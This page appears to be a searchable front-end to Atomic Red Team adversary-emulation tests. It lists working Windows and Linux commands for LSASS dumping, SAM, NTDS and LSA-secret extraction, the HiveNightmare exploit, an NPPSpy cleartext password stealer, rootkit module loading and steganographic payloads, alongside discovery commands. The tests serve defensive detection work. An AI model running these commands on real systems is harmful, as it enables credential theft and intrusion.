Issue is, it's just a bunch of YAML/MD files in a git tree. That's where I come in, I'm a sleek front-end to quickly search / filter Atomic Red Team tests. It's also for idiots like me that forgets flags for commands I've run millions of times what're the flags for adding a new local user in Windows again?
This page pulls fresh Atomic Red Team data every 24 hours (last: 2025-10-18) like magic. For feedback / words of affirmation: artatharrisonmdotcom. For test case updates, throw it upstream and it'll float down. For custom test cases: I'm thinking about it. Inspired by: a nightmare I had where a scruffy South African man yelled at me because I couldn't recite xfreerdp flags by heart.
Description: This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball)
within an image.
The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a
file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image
file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball
file within the image, utilizing steganography techniques for data obfuscation.
This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected.
By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
Prereq: Image file must exist
if (!(Test-Path "T1001.002\bin\T1001.002.jpg")) {exit 1} else { {exit 0} }
Prereq: File to hide within tarz file must exist
if (!(Test-Path "$env:TEMP\random_passwords.txt")) {exit 1} else { {exit 0} }
Prereq: Tarz file to embed in image must exist
if (!(Test-Path "$env:PUBLIC\Downloads\T1001.002.tarz")) {exit 1} else { {exit 0} }
Description: This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file.
The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden
within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden
PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a
separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.
Prereq: Image file must exist
if (!(Test-Path "T1001.002\bin\evil_kitten.jpg")) {exit 1} else { {exit 0} }
Prereq: Extract-Invoke-PSImage must exist
if (!(Test-Path "ExternalPayloads\Extract-Invoke-PSImage.ps1")) {exit 1} else { {exit 0} }
Description: This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
Prereq: ProcDump tool from Sysinternals must exist on disk at specified location (..\ExternalPayloads\procdump.exe)
if (Test-Path "..\ExternalPayloads\procdump.exe") {exit 0} else {exit 1}
Cleanup:
del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul
T1003.001 - OS Credential Dumping: LSASS Memory
Dump LSASS.exe Memory using comsvcs.dll
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
Dump LSASS.exe Memory using direct system calls and API unhooking
"..\ExternalPayloads\Outflank-Dumpert.exe"
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
Prereq: Dumpert executable must exist on disk at specified location (..\ExternalPayloads\Outflank-Dumpert.exe)
if (Test-Path "..\ExternalPayloads\Outflank-Dumpert.exe") {exit 0} else {exit 1}
Description: The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
Prereq: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
if (Test-Path ..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
Cleanup:
del "%temp%\nanodump.dmp" >nul 2> nul
T1003.001 - OS Credential Dumping: LSASS Memory
Dump LSASS.exe Memory using Windows Task Manager
{MISSING IN ATOMIC RED TEAM}
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
Prereq: Mimikatz must exist on disk at specified location (..\ExternalPayloads\x64\mimikatz.exe)
if (Test-Path "..\ExternalPayloads\x64\mimikatz.exe") {exit 0} else {exit 1}
Prereq: Lsass dump must exist at specified location (%tmp%\lsass.DMP)
cmd /c "if not exist %tmp%\lsass.DMP (exit /b 1)"
T1003.001 - OS Credential Dumping: LSASS Memory
LSASS read with pypykatz
"..\ExternalPayloads\venv_t1003_001\Scripts\pypykatz" live lsa
Description: Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
Prereq: ProcDump tool from Sysinternals must exist on disk at specified location (..\ExternalPayloads\procdump.exe)
if (Test-Path "..\ExternalPayloads\procdump.exe") {exit 0} else {exit 1}
Description: Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
Prereq: Computer must have xordump.exe
if (Test-Path 'C:\Windows\Temp\xordump.exe') {exit 0} else {exit 1}
Description: The memory of lsass.exe is often dumped for offline credential theft attacks.
This can be achieved with lolbin rdrleakdiag.exe.
Upon successful execution, you should see the following files created, $env:TEMP\minidump_.dmp and $env:TEMP\results_.hlk.
Description: WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a
memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism
introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
specific actions for a monitored process in one of two scenarios; either the process terminates
itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API.
The major advantage of this technique is that it does not cause lsass.exe to crash, and since
WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides
the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process,
from an attacker standpoint this is appealing as their illicit credential extraction will
appear benign because from a defender’s viewpoint it’s within the realm of normal activity.
Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.
Prereq: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
if (Test-Path ..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
T1003.002 - OS Credential Dumping: Security Account Manager
Registry dump of SAM, creds, and secrets
reg save HKLM\sam %temp%\sam reg save HKLM\system %temp%\system reg save HKLM\security %temp%\security
Description: Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Cleanup:
del %temp%\sam >nul 2> nul del %temp%\system >nul 2> nul del %temp%\security >nul 2> nul
T1003.002 - OS Credential Dumping: Security Account Manager
Registry parse with pypykatz
"..\ExternalPayloads\venv_t1003_002\Scripts\pypykatz" live lsa
Description: Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Description: Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
Cleanup:
del %temp%\SAM >nul 2>&1
T1003.002 - OS Credential Dumping: Security Account Manager
PowerDump Hashes and Usernames from Registry
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Import-Module "..\ExternalPayloads\PowerDump.ps1" Invoke-PowerDump
Description: Executes a hashdump by reading the hashes from the registry.
Prereq: PowerDump script must exist on disk at specified location
if (Test-Path "..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
T1003.002 - OS Credential Dumping: Security Account Manager
dump volume shadow copy hives with certutil
for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*
Description: Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
Cleanup:
for /L %a in (1,1,10) do @(del %temp%\SAMvss%a >nul 2>&1)
T1003.002 - OS Credential Dumping: Security Account Manager
Description: Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Cleanup:
del %temp%\sam >nul 2> nul del %temp%\system >nul 2> nul del %temp%\security >nul 2> nul
T1003.003 - OS Credential Dumping: NTDS
Create Volume Shadow Copy with vssadmin
vssadmin.exe create shadow /for=C:
Description: This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE
Description: This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
if not exist \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 (exit /b 1)
Prereq: Extract path must exist
if not exist C:\Windows\Temp (exit /b 1)
Cleanup:
del "C:\Windows\Temp\ntds.dit" >nul 2> nul del "C:\Windows\Temp\VSC_SYSTEM_HIVE" >nul 2> nul del "C:\Windows\Temp\SYSTEM_HIVE" >nul 2> nul
T1003.003 - OS Credential Dumping: NTDS
Dump Active Directory Database with NTDSUtil
mkdir C:\Windows\Temp\ntds_T1003 ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds_T1003" q q
Description: This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
Description: This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Description: This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Prereq: Target must be a reachable Domain Controller, and current context must be domain admin
wmic /node:"localhost" shadowcopy list brief
T1003.003 - OS Credential Dumping: NTDS
Create Volume Shadow Copy remotely (WMI) with esentutl
Description: This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
Prereq: Target must be a reachable Domain Controller, and current context must be domain admin
Description: This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Description: This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
Description: This test is intended to be run on a domain controller
An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
T1003.004 - OS Credential Dumping: LSA Secrets
Dumping LSA Secrets
"..\ExternalPayloads\T1003.004\bin\PsExec.exe" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
Description: Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
Prereq: PsExec from Sysinternals must exist on disk at specified location (..\ExternalPayloads\T1003.004\bin\PsExec.exe)
if (Test-Path "..\ExternalPayloads\T1003.004\bin\PsExec.exe") {exit 0} else {exit 1}
Description: This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
Ref: https://github.com/MzHmO/PowershellKerberos/
Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
T1003.005 - OS Credential Dumping: Cached Domain Credentials
Cached Credential Dump via Cmdkey
cmdkey /list
Description: List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
Credentials listed with Cmdkey only pertain to the current user
Passwords will not be displayed once they are stored
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
Description: Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
Prereq: Mimikatz executor must exist on disk and at specified location (%tmp%\mimikatz\x64\mimikatz.exe)
Description: The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
Prereq: DSInternals must be installed
$RequiredModule = Get-Module -Name DSInternals -ListAvailable if (-not $RequiredModule) {exit 1} if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
T1003.007 - OS Credential Dumping: Proc Filesystem
Description: Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
Prereq: Script to launch target process must exist
test -f /tmp/T1003.007.sh grep "T1003.007" /tmp/T1003.007.sh
Cleanup:
rm -f "/tmp/T1003.007.bin"
T1003.007 - OS Credential Dumping: Proc Filesystem
Dump individual process memory with sh on FreeBSD (Local)
Description: Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
Prereq: Script to launch target process must exist
test -f /tmp/T1003.007.sh grep "T1003.007" /tmp/T1003.007.sh
Cleanup:
rm -f "/tmp/T1003.007.bin"
T1003.007 - OS Credential Dumping: Proc Filesystem
Dump individual process memory with Python (Local)
sh /tmp/T1003.007.sh PID=$(pgrep -n -f "T1003.007") PYTHON=$(which python || which python3 || which python2) $PYTHON T1003.007/src/dump_heap.py $PID /tmp/T1003.007.bin grep -i "PASS" "/tmp/T1003.007.bin"
Description: Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
Prereq: Script to launch target process must exist
test -f /tmp/T1003.007.sh grep "T1003.007" /tmp/T1003.007.sh
Prereq: Requires Python
(which python || which python3 || which python2)
Cleanup:
rm -f "/tmp/T1003.007.bin"
T1003.007 - OS Credential Dumping: Proc Filesystem
Description: MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
Prereq: MimiPenguin script must exist on disk at specified location (/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh)
if [ -f "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" ]; then exit 0; else exit 1; fi;
Prereq: Strings must be installed
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
Prereq: Python2 must be installed
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
Prereq: Libc-bin must be installed
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
Cleanup:
rm -f /tmp/T1003.007Test3.txt > /dev/null
T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
Description: Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
Cleanup:
rm -f /tmp/T1003.008.txt
T1003 - OS Credential Dumping
Gsecdump
"..\ExternalPayloads\gsecdump.exe" -a
Description: Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's followed by two 32 character hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
Prereq: Gsecdump must exist on disk at specified location (..\ExternalPayloads\gsecdump.exe)
if (Test-Path "..\ExternalPayloads\gsecdump.exe") {exit 0} else {exit 1}
T1003 - OS Credential Dumping
Credential Dumping with NPPSpy
Copy-Item "..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32" $path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy" Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
Description: Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Prereq: NPPSpy.dll must be available in ExternalPayloads directory
if (Test-Path "..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
Description: The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
Description: AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
Prereq: IIS must be installed prior to running the test
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
T1003 - OS Credential Dumping
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
Description: AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
Prereq: IIS must be installed prior to running the test
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
T1003 - OS Credential Dumping
Dump Credential Manager using keymgr.dll and rundll32.exe
rundll32.exe keymgr,KRShowKeyMgr
Description: This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
T1003 - OS Credential Dumping
Send NTLM Hash with RPC Test Connection
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM 1>$Null
Description: RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Ref: https://twitter.com/vysecurity/status/974806438316072960
T1005 - Data from Local System
Search files of interest and save them to a single zip file (Windows)
Description: An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
Prereq: Check if running on a Debian based machine.
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
Description: This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
```
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS
```
T1007 - System Service Discovery
System Service Discovery
tasklist.exe sc query sc query state= all
Description: Identify system services.
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
T1007 - System Service Discovery
System Service Discovery - net.exe
net.exe start >> %temp%\service-list.txt
Description: Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in in the temp directory called service-list.txt.
Cleanup:
del /f /q /s %temp%\service-list.txt >nul 2>&1
T1007 - System Service Discovery
System Service Discovery - systemctl/service
if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
Description: Enumerates system service using systemctl/service
T1007 - System Service Discovery
Get-Service Execution
powershell.exe Get-Service
Description: Executes the Get-Service cmdlet to gather objects representing all services on the local system.
Description: Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
Prereq: T1010.cs must exist on disk at specified location (T1010\src\T1010.cs)
if (Test-Path "T1010\src\T1010.cs") {exit 0} else {exit 1}
Description: Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
References:
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
Description: Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
Description: This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
Description: The reg query commands allows to check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine thus allowing a regular user to install a Microsoft Windows Installer package with system level privileges. This can be abused by an attacker to escalate privileges in the host to SYSTEM level.
T1012 - Query Registry
Check Software Inventory Logging (SIL) status via Registry
Description: Microsoft's Software Inventory Logging (SIL) collects information about software installed per host basis. Adversary can use such logs to passively
check for existence of software of interest to them. Status of SIL can be checked via registry.
[Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
Description: The objective of this test is to query the SystemStartOptions key under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This action could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings. key is.
T1014 - Rootkit
Loadable Kernel Module based Rootkit
sudo insmod T1014/bin/T1014.ko
Description: Loadable Kernel Module based Rootkit
Prereq: The kernel module must exist on disk at specified location (T1014/bin/T1014.ko)
if [ -f T1014/bin/T1014.ko ]; then exit 0; else exit 1; fi;
Cleanup:
sudo rmmod T1014 sudo rm -rf T1014/bin
T1014 - Rootkit
Loadable Kernel Module based Rootkit
sudo modprobe T1014
Description: Loadable Kernel Module based Rootkit
Prereq: The kernel module must exist on disk at specified location (T1014/src/Linux/T1014.ko)
if [ -f /lib/modules/$(uname -r)/T1014.ko ]; then exit 0; else exit 1; fi;
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using ping Windows
ping -n 4 8.8.8.8
Description: Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using ping freebsd, linux or macos
ping -c 4 8.8.8.8
Description: Check internet connection using ping on Linux, MACOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
Test-NetConnection -ComputerName 8.8.8.8
Description: Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS).
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
Description: Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com.
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
Description: Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8.
T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
Enumerate Stored Wi-Fi Profiles And Passwords via netsh
netsh wlan show profile * key=clear
Description: Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
T1016 - System Network Configuration Discovery
System Network Configuration Discovery on Windows
ipconfig /all netsh interface show interface arp -a nbtstat -n net config
Description: Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
T1016 - System Network Configuration Discovery
List Windows Firewall Rules
netsh advfirewall firewall show rule name=all
Description: Enumerates Windows Firewall Rules using netsh.
Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
T1016 - System Network Configuration Discovery
System Network Configuration Discovery
